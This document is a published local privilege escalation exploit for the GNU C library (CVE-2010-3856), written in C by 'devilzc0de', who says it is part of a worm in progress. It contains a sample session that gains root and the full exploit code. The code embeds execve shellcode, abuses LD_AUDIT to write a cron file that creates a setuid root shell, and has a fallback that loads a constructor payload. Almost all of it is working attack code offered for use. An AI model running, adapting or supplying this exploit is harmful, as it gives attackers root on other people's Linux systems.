GNU C library (glibc) local root exploit (uid=0,gid=0) that leverages a ld.so arbitrary DSO loading via LD_AUDIT vulnerability.
a166f09637f10d8f9c395ecc8e4a485484727fbc73b491608d365b355986f067
/**
#Exploit Title: GNU C Library local root (uid=0,gid=0) exploit
#date: 04-12-10
#author: devilzc0de
#bugs found by: Tavis Ormandy (taviso@sdf.lonestar.org)
# Tested on: Debian GNU/Linux 5.0
#CVE: 2010-3856
#vulnerable : GNU C library
a basic exploit made by: devilzc0de (www.devilzc0de.org)
special thanks to all devilzc0de crews and members, glodhaxors crews and members
tis is part of my worm (currently making dual os worm for 7 months)
mywisdom@DL:~/sploit$ id
uid=1002(mywisdom) gid=1001(mywisdom) groups=1001(mywisdom)
mywisdom@DL:~/sploit$ ./glibc
GLIBC local privilege escalation exploit
Bugs found by Tavis Ormandy
made by: devilzc0de.org
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[+]waiting for dropped suid shell from our cron daemon, please wait ...
sh-3.2# id
uid=0(root) gid=0(root) groups=1001(mywisdom)
sh-3.2#
**/
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
void salam()
{
printf("\n\nGLIBC local privilege escalation exploit\n");
printf("\nBugs found by Tavis Ormandy\n");
printf("\nmade by: devilzc0de.org\n\n");
}
void eksplo1()
{
int i;
struct stat bufer;
umask(0);
bikin_payload1();
popen("dpkg -S /lib/libpcprofile.so","r");
if(stat("/lib/libpcprofile.so",&bufer)!=0)
{
eksplo2();
}
else
{
popen("LD_AUDIT='libpcprofile.so' PCPROFILE_OUTPUT='/etc/cron.d/w00t' ping","r");
}
if(stat("/etc/cron.d/w00t",&bufer)!=0)
{
eksplo2();
}
else
{
if(stat("/tmp/suidshell",&bufer)!=0)
{
exit(1);
}
else
{
popen("echo '* * * * * root cp /bin/dash /tmp/gotroot; chmod u+s /tmp/gotroot\n' > /etc/cron.d/w00t", "r");
}
printf("[+]waiting for dropped suid shell from our cron daemon, please wait ...\n");
usleep(60000000);
system("/tmp/./gotroot -c /tmp/./suidshell");
}
}
int bikin_payload1()
{
FILE *fp2;
const char *str2 ="char shellcode[] =\"\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80\";int main(){int (*f)() = (int(*)())shellcode;f();}";
fp2 = fopen("suid.c", "w");
fwrite(str2, 1, strlen(str2), fp2);
fclose(fp2);
popen("gcc -o /tmp/suidshell suid.c","r");
}
int bikin_payload2()
{
FILE *fp;
const char *str ="void __attribute__((constructor)) init(){ setuid(0);system(\"/bin/bash\");}";
fp = fopen("payload.c", "w");
fwrite(str, 1, strlen(str), fp);
fclose(fp);
popen("gcc -w -fPIC -shared -o /tmp/exploit payload.c","r");
}
void il_fil_de()
{
struct stat buf;
if(stat("payload.c",&buf)==0)
{
remove("payload.c");
}
if(stat("suid.c",&buf)==0)
{
remove("suid.c");
}
if(stat("/tmp/exploit",&buf)==0)
{
remove("/tmp/exploit");
}
}
int eksplo2()
{
remove("/tmp/exploit");
popen("mkdir /tmp/exploit;ln /bin/ping /tmp/exploit/target","r");
popen("exec 3< /tmp/exploit/target","r");
remove("/tmp/exploit");
bikin_payload2();
popen("LD_AUDIT=\"\\$ORIGIN\" exec /proc/self/fd/3","r");
}
int main(int argc,char **argv[])
{
struct stat buf;
salam();
il_fil_de();
mkdir("/tmp/exploit",0777);
if(stat("/etc/cron.d",&buf)!=0)
{
eksplo2();
}
else
{
eksplo1();
}
}